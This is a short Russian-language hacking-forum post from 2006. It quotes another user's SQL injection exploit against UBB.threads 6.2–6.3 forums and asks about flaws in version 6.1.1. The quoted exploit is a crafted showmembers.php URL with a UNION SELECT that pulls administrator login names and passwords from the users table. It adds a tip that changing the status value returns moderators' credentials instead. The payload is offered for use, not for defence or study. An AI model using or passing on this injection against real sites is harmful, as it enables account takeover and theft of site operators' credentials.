01.07.2006, 04:47
|
|
Banned
Регистрация: 12.06.2005
Сообщений: 278
Провел на форуме:
274158
Репутация:
-1
|
|
Сообщение от afonya
UBB.threads 6.2.*-6.3.* sql-injection:
http://[host]/showmembers.php?Cat=&like=1'%20union%20select%20U_ LoginName,0,0,U_Password,0,0,0%20from%20w3t_Users where U_Status='Administrator'/*
Выводим пассы всех админов... Заменяем Administrator на Moderator и получаем тоже тока для модеров.
если уязвимости в UBB.threads™ 6.1.1???
|
|
|